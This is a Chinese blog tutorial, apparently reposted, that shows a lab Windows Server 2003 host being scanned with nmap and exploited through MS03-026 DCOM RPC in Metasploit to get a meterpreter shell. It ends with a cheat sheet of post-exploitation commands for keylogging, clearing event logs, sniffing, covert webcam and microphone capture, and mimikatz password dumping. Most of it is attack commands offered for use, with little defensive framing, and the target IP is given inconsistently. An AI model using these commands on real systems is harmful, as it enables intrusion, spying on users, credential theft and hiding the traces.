网络安全kali web安全 Kali之msf简单的漏洞利用-Toy模板网

这篇具有很好参考价值的文章主要介绍了网络安全kali web安全 Kali之msf简单的漏洞利用。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

信息收集

靶机的IP地址为：192.168.173.136

利用nmap工具扫描其开放端口、系统等
网络安全kali web安全 Kali之msf简单的漏洞利用
整理一下目标系统的相关信息

系统版本：Windows server 2003

开放的端口及服务：

21/tcp   	ftp
135/tcp  	msrpc
139/tcp  	netbios-ssn
445/tcp  	microsoft-ds
777/tcp  	multiling-http
1025/tcp 	NFS-or-IIS
1026/tcp 	LSA-or-nterm
1029/tcp 	ms-lsa
1030/tcp 	iad1
6002/tcp 	X11:2
7001/tcp 	afs3-callback
7002/tcp 	afs3-prserver
8099/tcp 	未知服务

漏洞分析

从扫描出的端口发现，目标主机开启了135端口，服务为msrpc（远程过程调用服务），即Windows的RPC服务。

针对这个服务，我们就可以尝试去利用一下。

漏洞利用

kali机打开Metaspolit：

root@kali:~# msfconsole

查找所有跟Windows RPC相关的漏洞攻击：

msf5 > search dcom

网络安全kali web安全 Kali之msf简单的漏洞利用
使用MS-03-026 进行攻击：

msf5 > use exploit/windows/dcerpc/ms03_026_dcom

为了实施攻击，查看漏洞攻击的选项和条件：

msf5 exploit(windows/dcerpc/ms03_026_dcom) > show options

网络安全kali web安全 Kali之msf简单的漏洞利用
知道攻击所需要的条件，接下来进行设置，只需要设置我们攻击的目标主机即可：

msf5 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.174.136
RHOSTS => 192.168.174.136

设置好攻击条件之后，接下来就进行攻击：

msf5 exploit(windows/dcerpc/ms03_026_dcom) > exploit

网络安全kali web安全 Kali之msf简单的漏洞利用
执行攻击命令之后，我们获取到了目标主机的shell权限，现在，可以执行命令查看目标主机的一些东西，比如网络配置信息：

meterpreter > ipconfig

网络安全kali web安全 Kali之msf简单的漏洞利用
如需进一步攻击利用，可配合其他命令进一步操作。文章来源地址https://www.toymoban.com/news/detail-488585.html

meterpreter下相关命令

基本系统命令
——————————
shell			进入目标主机cmd shell
reboot			重启目标主机
shutdown		关闭目标主机
sysinfo			查看目标主机系统信息
background		将当前会话放置后台
info			查看已有信息模块
run				执行已有的模块，输入run后按tab键补全，会列出已有的脚本
clearav 		清除windows中的应用程序日志、系统日志、安全日志
ipconfig		查看网络配置信息
netstat			查看网络连接信息
getproxy		查看代理信息
route			查看路由
arp				查看arp信息

进程列表：
——————————
getuid			获取系统ID以及计算机名称
getpid			获取当前进程标识符
kill			结束进程
ps				列出正在运行中的进程

鼠标/键盘操作
——————————
keyscan_start	开启按键记录会话
keyscan_stop	终止按键记录会话
keyscan_dump	转储从目标主机捕获到的按键记录
uictl enable mouse 		启用鼠标
uictl disable mouse  	禁用鼠标
uictl enable keyboard	启用键盘
uictl disable keyboard  禁用键盘

会话
——————————
enumdesktops	列举所有可访问到的桌面和工作站
getdesktop		获取当前Meterpreter桌面
setdesktop		变更Meterpreter当前桌面

嗅探功能
——————————
use sniffer		加载嗅探功能
sniffer_interfaces   	查看网卡
sniffer_start	开始对网卡执行嗅探
sniffer_stats	查看状态
sniffer_stop	停止对网卡的嗅探
sniffer_dump	将捕获到的目标主机上的数据转储到本地

摄像头命令
——————————
webcam_list		列举系统所有的摄像头
webcam_snap		使用目标主机摄像头拍照
record_mic		从主机的默认麦克风中记录环境声音
webcam_stream	通过摄像头开启视频

远程桌面/截屏
——————————
enumdesktops	查看可用的桌面
getdesktop		获取当前meterpreter 关联的桌面
set_desktop		设置meterpreter关联的桌面  -h查看帮助
screenshot		截屏
use espia		或者使用espia模块截屏  然后输入screengrab
run vnc			使用vnc远程桌面连接

抓取密码
——————————
load mimikatz	查看帮助
wdigest			获取Wdigest密码
mimikatz_command -f samdump::hashes		执行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords

到了这里，关于网络安全kali web安全 Kali之msf简单的漏洞利用的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！